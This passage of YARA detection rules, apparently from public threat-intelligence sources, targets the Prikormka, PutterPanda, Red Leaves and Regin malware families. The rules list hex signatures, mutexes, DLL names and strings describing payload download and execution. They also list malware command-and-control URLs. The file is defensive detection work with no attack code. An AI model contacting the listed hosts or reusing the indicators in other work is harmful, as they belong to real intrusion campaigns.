above copyright notice, this // list of conditions and the following disclaimer. // // 2. Redistributions in binary form must reproduce the above copyright notice, // this list of conditions and the following disclaimer in the documentation // and/or other materials provided with the distribution. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" // AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE // IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE // DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE // FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL // DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER // CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, // OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE // OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. // rule PrikormkaDropper { strings: $mz = { 4D 5A } $kd1 = "KDSTORAGE" wide $kd2 = "KDSTORAGE_64" wide $kd3 = "KDRUNDRV32" wide $kd4 = "KDRAR" wide $bin1 = {69 65 04 15 00 14 1E 4A 16 42 08 6C 21 61 24 0F} $bin2 = {76 6F 05 04 16 1B 0D 5E 0D 42 08 6C 20 45 18 16} $bin3 = {4D 00 4D 00 43 00 00 00 67 00 75 00 69 00 64 00 56 00 47 00 41 00 00 00 5F 00 73 00 76 00 67 00} $inj1 = "?AVCinj2008Dlg@@" ascii $inj2 = "?AVCinj2008App@@" ascii condition: ($mz at 0) and ((any of ($bin*)) or (3 of ($kd*)) or (all of ($inj*))) } rule PrikormkaModule { strings: $mz = { 4D 5A } // binary $str1 = {6D 70 2E 64 6C 6C 00 53 74 61 72 74 69 6E 67 00} $str2 = {68 6C 70 75 63 74 66 2E 64 6C 6C 00 43 79 63 6C 65} $str3 = {00 6B 6C 2E 64 6C 6C 00 53 74 61 72 74 69 6E 67 00} $str4 = {69 6F 6D 75 73 2E 64 6C 6C 00 53 74 61 72 74 69 6E 67} $str5 = {61 74 69 6D 6C 2E 64 6C 6C 00 4B 69 63 6B 49 6E 50 6F 69 6E 74} $str6 = {73 6E 6D 2E 64 6C 6C 00 47 65 74 52 65 61 64 79 46 6F 72 44 65 61 64} $str7 = {73 63 72 73 68 2E 64 6C 6C 00 47 65 74 52 65 61 64 79 46 6F 72 44 65 61 64} // encrypted $str8 = {50 52 55 5C 17 51 58 17 5E 4A} $str9 = {60 4A 55 55 4E 53 58 4B 17 52 57 17 5E 4A} $str10 = {55 52 5D 4E 5B 4A 5D 17 51 58 17 5E 4A} $str11 = {60 4A 55 55 4E 61 17 51 58 17 5E 4A} $str12 = {39 5D 17 1D 1C 0A 3C 57 59 3B 1C 1E 57 58 4C 54 0F} // mutex $str13 = "ZxWinDeffContex" ascii wide $str14 = "Paramore756Contex43" wide $str15 = "Zw_&one@ldrContext43" wide // other $str16 = "A95BL765MNG2GPRS" // dll names $str17 = "helpldr.dll" wide fullword $str18 = "swma.dll" wide fullword $str19 = "iomus.dll" wide fullword $str20 = "atiml.dll" wide fullword $str21 = "hlpuctf.dll" wide fullword $str22 = "hauthuid.dll" ascii wide fullword // rbcon $str23 = "[roboconid][%s]" ascii fullword $str24 = "[objectset][%s]" ascii fullword $str25 = "rbcon.ini" wide fullword // files and logs $str26 = "%s%02d.%02d.%02d_%02d.%02d.%02d.skw" ascii fullword $str27 = "%02d.%02d.%02d_%02d.%02d.%02d.%02d.rem" wide fullword // pdb strings $str28 = ":\\!PROJECTS!\\Mina\\2015\\" ascii $str29 = "\\PZZ\\RMO\\" ascii $str30 = ":\\work\\PZZ" ascii $str31 = "C:\\Users\\mlk\\" ascii $str32 = ":\\W o r k S p a c e\\" ascii $str33 = "D:\\My\\Projects_All\\2015\\" ascii $str34 = "\\TOOLS PZZ\\Bezzahod\\" ascii condition: ($mz at 0) and (any of ($str*)) } rule PrikormkaEarlyVersion { strings: $mz = { 4D 5A } $str36 = "IntelRestore" ascii fullword $str37 = "Resent" wide fullword $str38 = "ocp8.1" wide fullword $str39 = "rsfvxd.dat" ascii fullword $str40 = "tsb386.dat" ascii fullword $str41 = "frmmlg.dat" ascii fullword $str42 = "smdhost.dll" ascii fullword $str43 = "KDLLCFX" wide fullword $str44 = "KDLLRUNDRV" wide fullword condition: ($mz at 0) and (2 of ($str*)) } rule Prikormka { meta: Author = "Anton Cherepanov" Date = "2016/05/10" Description = "Operation Groundbait" Source = "https://github.com/eset/malware-ioc/" Contact = "threatintel@eset.com" License = "BSD 2-Clause" condition: PrikormkaDropper or PrikormkaModule or PrikormkaEarlyVersion } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule APT_Malware_PutterPanda_Rel { meta: description = "Detects an APT malware related to PutterPanda" author = "Florian Roth" score = 70 reference = "VT Analysis" date = "2015-06-03" hash = "5367e183df155e3133d916f7080ef973f7741d34" strings: $x0 = "app.stream-media.net" fullword ascii /* score: '12.03' */ $x1 = "File %s does'nt exist or is forbidden to acess!" fullword ascii /* PEStudio Blacklist: strings */ /* score: '16.035' */ $s6 = "GetProcessAddresss of pHttpQueryInfoA Failed!" fullword ascii /* PEStudio Blacklist: strings */ /* score: '32.02' */ $s7 = "Connect %s error!" fullword ascii /* PEStudio Blacklist: strings */ /* score: '16.04' */ $s9 = "Download file %s successfully!" fullword ascii /* PEStudio Blacklist: strings */ /* score: '14.03' */ $s10 = "index.tmp" fullword ascii /* score: '14.03' */ $s11 = "Execute PE Successfully" fullword ascii /* PEStudio Blacklist: strings */ /* score: '13.03' */ $s13 = "aa/22/success.xml" fullword ascii /* score: '12.005' */ $s16 = "aa/22/index.asp" fullword ascii /* score: '11.02' */ $s18 = "File %s a Non-Pe File" fullword ascii /* score: '8.04' */ $s19 = "SendRequset error!" fullword ascii /* score: '8.04' */ $s20 = "filelist[%d]=%s" fullword ascii /* score: '7.015' */ condition: ( uint16(0) == 0x5a4d and 1 of ($x*) ) or ( 4 of ($s*) ) } rule APT_Malware_PutterPanda_Rel_2 { meta: description = "APT Malware related to PutterPanda Group" author = "Florian Roth" score = 70 reference = "VT Analysis" date = "2015-06-03" hash = "f97e01ee04970d1fc4d988a9e9f0f223ef2a6381" strings: $s0 = "http://update.konamidata.com/test/zl/sophos/td/result/rz.dat?" fullword ascii /* PEStudio Blacklist: strings */ /* score: '28.01' */ $s1 = "http://update.konamidata.com/test/zl/sophos/td/index.dat?" fullword ascii /* PEStudio Blacklist: strings */ /* score: '28.01' */ $s2 = "Mozilla/4.0 (Compatible; MSIE 6.0;)" fullword ascii /* PEStudio Blacklist: agent */ /* score: '20.03' */ $s3 = "Internet connect error:%d" fullword ascii /* PEStudio Blacklist: strings */ /* score: '14.035' */ $s4 = "Proxy-Authorization:Basic" fullword ascii /* PEStudio Blacklist: strings */ /* score: '14.02' */ $s5 = "HttpQueryInfo failed:%d" fullword ascii /* PEStudio Blacklist: strings */ /* score: '13.015' */ $s6 = "read file error:%d" fullword ascii /* score: '11.04' */ $s7 = "downdll.dll" fullword ascii /* score: '11.025' */ $s8 = "rz.dat" fullword ascii /* score: '10.005' */ $s9 = "Invalid url" fullword ascii /* PEStudio Blacklist: strings */ /* score: '9.03' */ $s10 = "Create file failed" fullword ascii /* score: '8.045' */ $s11 = "myAgent" fullword ascii /* score: '8.025' */ $s12 = "%s%s%d%d" fullword ascii /* score: '8.005' */ $s13 = "down file success" fullword ascii /* score: '7.035' */ $s15 = "error!" fullword ascii /* score: '6.04' */ $s18 = "Avaliable data:%u bytes" fullword ascii /* score: '5.025' */ condition: uint16(0) == 0x5a4d and 6 of them } rule APT_Malware_PutterPanda_PSAPI { meta: description = "Detects a malware related to Putter Panda" author = "Florian Roth" score = 70 reference = "VT Analysis" date = "2015-06-03" hash = "f93a7945a33145bb6c106a51f08d8f44eab1cdf5" strings: $s0 = "LOADER ERROR" fullword ascii /* PEStudio Blacklist: strings */ /* score: '12.03' */ $s1 = "The procedure entry point %s could not be located in the dynamic link library %s" fullword ascii /* PEStudio Blacklist: strings */ /* score: '8.045' */ $s2 = "psapi.dll" fullword ascii /* PEStudio Blacklist: strings */ /* score: '5' */ /* Goodware String - occured 54 times */ $s3 = "urlmon.dll" fullword ascii /* PEStudio Blacklist: strings */ /* score: '5' */ /* Goodware String - occured 471 times */ $s4 = "WinHttpGetProxyForUrl" fullword ascii /* PEStudio Blacklist: strings */ /* score: '5' */ /* Goodware String - occured 179 times */ condition: uint16(0) == 0x5a4d and filesize < 300KB and all of them } rule APT_Malware_PutterPanda_WUAUCLT { meta: description = "Detects a malware related to Putter Panda" author = "Florian Roth" score = 70 reference = "VT Analysis" date = "2015-06-03" hash = "fd5ca5a2d444865fa8320337467313e4026b9f78" strings: $x0 = "WUAUCLT.EXE" fullword wide /* PEStudio Blacklist: strings */ /* score: '20.01' */ $x1 = "%s\\tmp%d.exe" fullword ascii /* score: '14.01' */ $x2 = "Microsoft Corporation. All rights reserved." fullword wide /* score: '8.04' */ $s1 = "Microsoft Windows Operating System" fullword wide /* PEStudio Blacklist: strings */ /* score: '5' */ /* Goodware String - occured 4 times */ $s2 = "InternetQueryOptionA" fullword ascii /* PEStudio Blacklist: strings */ /* score: '5' */ /* Goodware String - occured 166 times */ $s3 = "LookupPrivilegeValueA" fullword ascii /* PEStudio Blacklist: strings */ /* score: '5' */ /* Goodware String - occured 336 times */ $s4 = "WNetEnumResourceA" fullword ascii /* PEStudio Blacklist: strings */ /* score: '5' */ /* Goodware String - occured 29 times */ $s5 = "HttpSendRequestExA" fullword ascii /* PEStudio Blacklist: strings */ /* score: '5' */ /* Goodware String - occured 87 times */ $s6 = "PSAPI.DLL" fullword ascii /* PEStudio Blacklist: strings */ /* score: '5' */ /* Goodware String - occured 420 times */ $s7 = "Microsoft(R) Windows(R) Operating System" fullword wide /* PEStudio Blacklist: strings */ /* score: '5' */ /* Goodware String - occured 128 times */ $s8 = "CreatePipe" fullword ascii /* PEStudio Blacklist: strings */ /* score: '5' */ /* Goodware String - occured 222 times */ $s9 = "EnumProcessModules" fullword ascii /* PEStudio Blacklist: strings */ /* score: '5' */ /* Goodware String - occured 410 times */ condition: all of ($x*) or (1 of ($x*) and all of ($s*) ) } rule APT_Malware_PutterPanda_Gen1 { meta: description = "Detects a malware " author = "YarGen Rule Generator" reference = "not set" date = "2015-06-03" super_rule = 1 hash0 = "bf1d385e637326a63c4d2f253dc211e6a5436b6a" hash1 = "76459bcbe072f9c29bb9703bc72c7cd46a692796" hash2 = "e105a7a3a011275002aec4b930c722e6a7ef52ad" strings: $s1 = "%s%duserid=%dthreadid=%dgroupid=%d" fullword ascii /* PEStudio Blacklist: strings */ /* score: '22.02' */ $s2 = "ssdpsvc.dll" fullword ascii /* score: '11.00' */ $s3 = "Fail %s " fullword ascii /* score: '10.04' */ $s4 = "%s%dpara1=%dpara2=%dpara3=%d" fullword ascii /* score: '10.01' */ $s5 = "LsaServiceInit" fullword ascii /* score: '7.03' */ $s6 = "%-8d Fs %-12s Bs " fullword ascii /* score: '5.04' */ $s7 = "Microsoft DH SChannel Cryptographic Provider" fullword ascii /* PEStudio Blacklist: strings */ /* score: '5.00' */ /* Goodware String - occured 5 times */ condition: uint16(0) == 0x5a4d and filesize < 1000KB and 5 of them } rule Malware_MsUpdater_String_in_EXE { meta: description = "MSUpdater String in Executable" author = "Florian Roth" score = 50 reference = "VT Analysis" date = "2015-06-03" hash = "b1a2043b7658af4d4c9395fa77fde18ccaf549bb" strings: $x1 = "msupdate.exe" fullword wide /* PEStudio Blacklist: strings */ /* score: '20.01' */ // $x2 = "msupdate" fullword wide /* PEStudio Blacklist: strings */ /* score: '13.01' */ $x3 = "msupdater.exe" fullword ascii /* PEStudio Blacklist: strings */ /* score: '20.02' */ $x4 = "msupdater32.exe" fullword ascii $x5 = "msupdater32.exe" fullword wide $x6 = "msupdate.pif" fullword ascii $fp1 = "_msupdate_" wide /* False Positive */ $fp2 = "_msupdate_" ascii /* False Positive */ $fp3 = "/kies" wide condition: uint16(0) == 0x5a4d and filesize < 500KB and ( 1 of ($x*) ) and not ( 1 of ($fp*) ) } rule APT_Malware_PutterPanda_MsUpdater_3 { meta: description = "Detects Malware related to PutterPanda - MSUpdater" author = "Florian Roth" score = 70 reference = "VT Analysis" date = "2015-06-03" hash = "464149ff23f9c7f4ab2f5cadb76a4f41f969bed0" strings: $s0 = "msupdater.exe" fullword ascii /* PEStudio Blacklist: strings */ /* score: '20.02' */ $s1 = "Explorer.exe \"" fullword ascii /* PEStudio Blacklist: strings */ /* score: '16.05' */ $s2 = "FAVORITES.DAT" fullword ascii /* score: '11.02' */ $s4 = "COMSPEC" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.82' */ /* Goodware String - occured 178 times */ condition: uint16(0) == 0x5a4d and 3 of them } rule APT_Malware_PutterPanda_MsUpdater_1 { meta: description = "Detects Malware related to PutterPanda - MSUpdater" author = "Florian Roth" score = 70 reference = "VT Analysis" date = "2015-06-03" hash = "b55072b67543f58c096571c841a560c53d72f01a" strings: $x0 = "msupdate.exe" fullword wide /* PEStudio Blacklist: strings */ /* score: '20.01' */ $x1 = "msupdate" fullword wide /* PEStudio Blacklist: strings */ /* score: '13.01' */ $s1 = "Microsoft Corporation. All rights reserved." fullword wide /* score: '8.04' */ $s2 = "Automatic Updates" fullword wide /* PEStudio Blacklist: strings */ /* score: '4.98' */ /* Goodware String - occured 22 times */ $s3 = "VirtualProtectEx" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.93' */ /* Goodware String - occured 68 times */ $s4 = "Invalid parameter" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.93' */ /* Goodware String - occured 69 times */ $s5 = "VirtualAllocEx" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.91' */ /* Goodware String - occured 95 times */ $s6 = "WriteProcessMemory" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.87' */ /* Goodware String - occured 131 times */ condition: ( uint16(0) == 0x5a4d and 1 of ($x*) and 4 of ($s*) ) or ( 1 of ($x*) and all of ($s*) ) } rule APT_Malware_PutterPanda_MsUpdater_2 { meta: description = "Detects Malware related to PutterPanda - MSUpdater" author = "Florian Roth" score = 70 reference = "VT Analysis" date = "2015-06-03" hash = "365b5537e3495f8ecfabe2597399b1f1226879b1" strings: $s0 = "winsta0\\default" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.99' */ /* Goodware String - occured 6 times */ $s1 = "EXPLORER.EXE" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.98' */ /* Goodware String - occured 22 times */ $s2 = "WNetEnumResourceA" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.97' */ /* Goodware String - occured 29 times */ $s3 = "explorer.exe" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.97' */ /* Goodware String - occured 31 times */ $s4 = "CreateProcessAsUserA" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.91' */ /* Goodware String - occured 86 times */ $s5 = "HttpSendRequestExA" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.91' */ /* Goodware String - occured 87 times */ $s6 = "HttpEndRequestA" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.91' */ /* Goodware String - occured 91 times */ $s7 = "GetModuleBaseNameA" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.88' */ /* Goodware String - occured 121 times */ $s8 = "GetModuleFileNameExA" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.86' */ /* Goodware String - occured 144 times */ $s9 = "HttpSendRequestA" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.85' */ /* Goodware String - occured 154 times */ $s10 = "HttpOpenRequestA" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.84' */ /* Goodware String - occured 159 times */ $s11 = "InternetConnectA" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.82' */ /* Goodware String - occured 183 times */ $s12 = "Process32Next" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.80' */ /* Goodware String - occured 204 times */ $s13 = "Process32First" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.79' */ /* Goodware String - occured 210 times */ $s14 = "CreatePipe" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.78' */ /* Goodware String - occured 222 times */ $s15 = "EnumProcesses" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.73' */ /* Goodware String - occured 273 times */ $s16 = "LookupPrivilegeValueA" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.66' */ /* Goodware String - occured 336 times */ $s17 = "PeekNamedPipe" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.65' */ /* Goodware String - occured 347 times */ $s18 = "EnumProcessModules" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.59' */ /* Goodware String - occured 410 times */ $s19 = "PSAPI.DLL" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.58' */ /* Goodware String - occured 420 times */ $s20 = "SPSSSQ" fullword ascii /* score: '4.51' */ condition: uint16(0) == 0x5a4d and filesize < 220KB and all of them } rule APT_Malware_PutterPanda_Gen4 { meta: description = "Detects Malware related to PutterPanda" author = "Florian Roth" score = 70 reference = "VT Analysis" date = "2015-06-03" super_rule = 1 hash0 = "71a8378fa8e06bcf8ee9f019c807c6bfc58dca0c" hash1 = "8fdd6e5ed9d69d560b6fdd5910f80e0914893552" hash2 = "3c4a762175326b37035a9192a981f7f4cc2aa5f0" hash3 = "598430b3a9b5576f03cc4aed6dc2cd8a43324e1e" hash4 = "6522b81b38747f4aa09c98fdaedaed4b00b21689" strings: $x1 = "rz.dat" fullword ascii /* score: '10.00' */ $s0 = "Mozilla/4.0 (Compatible; MSIE 6.0;)" fullword ascii /* PEStudio Blacklist: agent */ /* score: '20.03' */ $s1 = "Internet connect error:%d" fullword ascii /* PEStudio Blacklist: strings */ /* score: '14.04' */ $s2 = "Proxy-Authorization:Basic " fullword ascii /* PEStudio Blacklist: strings */ /* score: '14.02' */ $s5 = "Invalid url" fullword ascii /* PEStudio Blacklist: strings */ /* score: '9.03' */ $s6 = "Create file failed" fullword ascii /* score: '8.04' */ $s7 = "myAgent" fullword ascii /* score: '8.03' */ $z1 = "%s%s%d%d" fullword ascii /* score: '8.00' */ $z2 = "HttpQueryInfo failed:%d" fullword ascii /* PEStudio Blacklist: strings */ /* score: '13.02' */ $z3 = "read file error:%d" fullword ascii /* score: '11.04' */ $z4 = "down file success" fullword ascii /* score: '7.04' */ $z5 = "kPStoreCreateInstance" fullword ascii /* score: '5.03' */ $z6 = "Avaliable data:%u bytes" fullword ascii /* score: '5.03' */ $z7 = "abe2869f-9b47-4cd9-a358-c22904dba7f7" fullword ascii /* PEStudio Blacklist: guid */ /* score: '5.00' */ /* Goodware String - occured 2 times */ condition: filesize < 300KB and (( uint16(0) == 0x5a4d and $x1 and 3 of ($s*) ) or ( 3 of ($s*) and 4 of ($z*) )) } rule malware_red_leaves_generic { meta: author = "David Cannings" description = "Red Leaves malware, related to APT10" // This hash from VT retrohunt, original sample was a memory dump sha256 = "2e1f902de32b999642bb09e995082c37a024f320c683848edadaf2db8e322c3c" strings: // MiniLZO release date $ = "Feb 04 2015" $ = "I can not start %s" $ = "dwConnectPort" fullword $ = "dwRemoteLanPort" fullword $ = "strRemoteLanAddress" fullword $ = "strLocalConnectIp" fullword $ = "\\\\.\\pipe\\NamePipe_MoreWindows" wide $ = "RedLeavesCMDSimulatorMutex" wide $ = "(NT %d.%d Build %d)" wide $ = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)" wide $ = "red_autumnal_leaves_dllmain.dll" wide ascii $ = "__data" wide $ = "__serial" wide $ = "__upt" wide $ = "__msgid" wide condition: 7 of them } rule malware_red_leaves_memory { meta: author = "David Cannings" description = "Red Leaves C&C left in memory, use with Volatility / Rekall" strings: $ = "__msgid=" wide ascii $ = "__serial=" wide ascii $ = "OnlineTime=" wide // Indicates a file transfer $ = "clientpath=" wide ascii $ = "serverpath=" wide ascii condition: 3 of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. Warning: Don't use this rule set without excluding the false positive hashes listed in the file falsepositive-hashes.txt from https://github.com/Neo23x0/Loki/blob/master/signatures/falsepositive-hashes.txt */ import "pe" rule Regin_APT_KernelDriver_Generic_A { meta: description = "Generic rule for Regin APT kernel driver Malware - Symantec http://t.co/qu53359Cb2" author = "@Malwrsignatures - included in APT Scanner THOR" date = "23.11.14" hash1 = "187044596bc1328efa0ed636d8aa4a5c" hash2 = "06665b96e293b23acc80451abb413e50" hash3 = "d240f06e98c8d3e647cbf4d442d79475" strings: $m0 = { 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 } $m1 = { 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e } $s0 = "atapi.sys" fullword wide $s1 = "disk.sys" fullword wide $s3 = "h.data" fullword ascii $s4 = "\\system32" fullword ascii $s5 = "\\SystemRoot" fullword ascii $s6 = "system" fullword ascii $s7 = "temp" fullword ascii $s8 = "windows" fullword ascii $x1 = "LRich6" fullword ascii $x2 = "KeServiceDescriptorTable" fullword ascii condition: $m0 at 0 and $m1 and all of ($s*) and 1 of ($x*) } rule Regin_APT_KernelDriver_Generic_B { meta: description = "Generic rule for Regin APT kernel driver Malware - Symantec http://t.co/qu53359Cb2" author = "@Malwrsignatures - included in APT Scanner THOR" date = "23.11.14" hash1 = "ffb0b9b5b610191051a7bdf0806e1e47" hash2 = "bfbe8c3ee78750c3a520480700e440f8" hash3 = "b29ca4f22ae7b7b25f79c1d4a421139d" hash4 = "06665b96e293b23acc80451abb413e50" hash5 = "2c8b9d2885543d7ade3cae98225e263b" hash6 = "4b6b86c7fec1c574706cecedf44abded" hash7 = "187044596bc1328efa0ed636d8aa4a5c" hash8 = "d240f06e98c8d3e647cbf4d442d79475" hash9 = "6662c390b2bbbd291ec7987388fc75d7" hash10 = "1c024e599ac055312a4ab75b3950040a" hash11 = "ba7bb65634ce1e30c1e5415be3d1db1d" hash12 = "b505d65721bb2453d5039a389113b566" hash13 = "b269894f434657db2b15949641a67532" strings: $m0 = { 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 } $s1 = { 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e } $s2 = "H.data" fullword ascii nocase $s3 = "INIT" fullword ascii $s4 = "ntoskrnl.exe" fullword ascii $v1 = "\\system32" fullword ascii $v2 = "\\SystemRoot" fullword ascii $v3 = "KeServiceDescriptorTable" fullword ascii $w1 = "\\system32" fullword ascii $w2 = "\\SystemRoot" fullword ascii $w3 = "LRich6" fullword ascii $x1 = "_snprintf" fullword ascii $x2 = "_except_handler3" fullword ascii $y1 = "mbstowcs" fullword ascii $y2 = "wcstombs" fullword ascii $y3 = "KeGetCurrentIrql" fullword ascii $z1 = "wcscpy" fullword ascii $z2 = "ZwCreateFile" fullword ascii $z3 = "ZwQueryInformationFile" fullword ascii $z4 = "wcslen" fullword ascii $z5 = "atoi" fullword ascii condition: $m0 at 0 and all of ($s*) and ( all of ($v*) or all of ($w*) or all of ($x*) or all of ($y*) or all of ($z*) ) and filesize < 20KB } rule Regin_APT_KernelDriver_Generic_C { meta: description = "Generic rule for Regin APT kernel driver Malware - Symantec http://t.co/qu53359Cb2" author = "@Malwrsignatures - included in APT Scanner THOR" date = "23.11.14" hash1 = "e0895336617e0b45b312383814ec6783556d7635" hash2 = "732298fa025ed48179a3a2555b45be96f7079712" strings: $m0 = { 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 } $s0 = "KeGetCurrentIrql" fullword ascii $s1 = "5.2.3790.0 (srv03_rtm.030324-2048)" fullword wide $s2 = "usbclass" fullword wide $x1 = "PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING" ascii $x2 = "Universal Serial Bus Class Driver" fullword wide $x3 = "5.2.3790.0" fullword wide $y1 = "LSA Shell" fullword wide $y2 = "0Richw" fullword ascii condition: $m0 at 0 and all of ($s*) and ( all of ($x*) or all of ($y*) ) and filesize < 20KB } /* Update 27.11.14 */ rule Regin_sig_svcsstat { meta: description = "Detects svcstat from Regin report - file svcsstat.exe_sample" author = "@MalwrSignatures" date = "26.11.14" hash = "5164edc1d54f10b7cb00a266a1b52c623ab005e2" strings: $s0 = "Service Control Manager" fullword ascii $s1 = "_vsnwprintf" fullword ascii $s2 = "Root Agency" fullword ascii $s3 = "Root Agency0" fullword ascii $s4 = "StartServiceCtrlDispatcherA" fullword ascii $s5 = "\\\\?\\UNC" fullword wide $s6 = "%ls%ls" fullword wide condition: all of them and filesize < 15KB and filesize > 10KB } rule Regin_Sample_1 { meta: description = "Auto-generated rule - file-3665415_sys" author = "@MalwrSignatures" date = "26.11.14" hash = "773d7fab06807b5b1bc2d74fa80343e83593caf2" strings: $s0 = "Getting PortName/Identifier failed - %x" fullword ascii $s1 = "SerialAddDevice - error creating new devobj [%#08lx]" fullword ascii $s2 = "External Naming Failed - Status %x" fullword ascii $s3 = "------- Same multiport - different interrupts" fullword ascii $s4 = "%x occurred prior to the wait - starting the" fullword ascii $s5 = "'user registry info - userPortIndex: %d" fullword ascii $s6 = "Could not report legacy device - %x" fullword ascii $s7 = "entering SerialGetPortInfo" fullword ascii $s8 = "'user registry info - userPort: %x" fullword ascii $s9 = "IoOpenDeviceRegistryKey failed - %x " fullword ascii $s10 = "Kernel debugger is using port at address %X" fullword ascii $s12 = "Release - freeing multi context" fullword ascii $s13 = "Serial driver will not load port" fullword ascii $s14 = "'user registry info - userAddressSpace: %d" fullword ascii $s15 = "SerialAddDevice: Enumeration request, returning NO_MORE_ENTRIES" fullword ascii $s20 = "'user registry info - userIndexed: %d" fullword ascii condition: all of them and filesize < 110KB and filesize > 80KB } rule Regin_Sample_2 { meta: description = "Auto-generated rule - file hiddenmod_hookdisk_and_kdbg_8949d000.bin" author = "@MalwrSignatures" date = "26.11.14" hash = "a7b285d4b896b66fce0ebfcd15db53b3a74a0400" strings: $s0 = "\\SYSTEMROOT\\system32\\lsass.exe" fullword wide $s1 = "atapi.sys" fullword wide $s2 = "disk.sys" fullword wide $s3 = "IoGetRelatedDeviceObject" fullword ascii $s4 = "HAL.dll" fullword ascii $s5 = "\\Registry\\Machine\\System\\CurrentControlSet\\Services" fullword ascii $s6 = "PsGetCurrentProcessId" fullword ascii $s7 = "KeGetCurrentIrql" fullword ascii $s8 = "\\REGISTRY\\Machine\\System\\CurrentControlSet\\Control\\Session Manager" wide $s9 = "KeSetImportanceDpc" fullword ascii $s10 = "KeQueryPerformanceCounter" fullword ascii $s14 = "KeInitializeEvent" fullword ascii $s15 = "KeDelayExecutionThread" fullword ascii $s16 = "KeInitializeTimerEx" fullword ascii $s18 = "PsLookupProcessByProcessId" fullword ascii $s19 = "ExReleaseFastMutexUnsafe" fullword ascii $s20 = "ExAcquireFastMutexUnsafe" fullword ascii condition: all of them and filesize < 40KB and filesize > 30KB } rule Regin_Sample_3 { meta: description = "Detects Regin Backdoor sample fe1419e9dde6d479bd7cda27edd39fafdab2668d498931931a2769b370727129" author = "@Malwrsignatures" date = "27.11.14" hash = "fe1419e9dde6d479bd7cda27edd39fafdab2668d498931931a2769b370727129" strings: $hd = { fe ba dc fe } $s0 = "Service Pack x" fullword wide $s1 = "\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion" fullword wide $s2 = "\\REGISTRY\\Machine\\Software\\Microsoft\\Windows NT\\CurrentVersion\\HotFix" fullword wide $s3 = "mntoskrnl.exe" fullword wide $s4 = "\\REGISTRY\\Machine\\System\\CurrentControlSet\\Control\\Session Manager\\Memory Management" fullword wide $s5 = "Memory location: 0x%p, size 0x%08x" wide fullword $s6 = "Service Pack" fullword wide $s7 = ".sys" fullword wide $s8 = ".dll" fullword wide $s10 = "\\REGISTRY\\Machine\\Software\\Microsoft\\Updates" fullword wide $s11 = "IoGetRelatedDeviceObject" fullword ascii $s12 = "VMEM.sys" fullword ascii $s13 = "RtlGetVersion" fullword wide $s14 = "ntkrnlpa.exe" fullword ascii condition: ( $hd at 0 ) and all of ($s*) and filesize > 160KB and filesize < 200KB } rule Regin_Sample_Set_1 { meta: description = "Auto-generated rule - file SHF-000052 and ndisips.sys" author = "@MalwrSignatures" date = "26.11.14" hash1 = "8487a961c8244004c9276979bb4b0c14392fc3b8" hash2 = "bcf3461d67b39a427c83f9e39b9833cfec977c61" strings: $s0 = "HAL.dll" fullword ascii $s1 = "IoGetDeviceObjectPointer" fullword ascii $s2 = "MaximumPortsServiced" fullword wide $s3 = "KeGetCurrentIrql" fullword ascii $s4 = "ntkrnlpa.exe" fullword ascii $s5 = 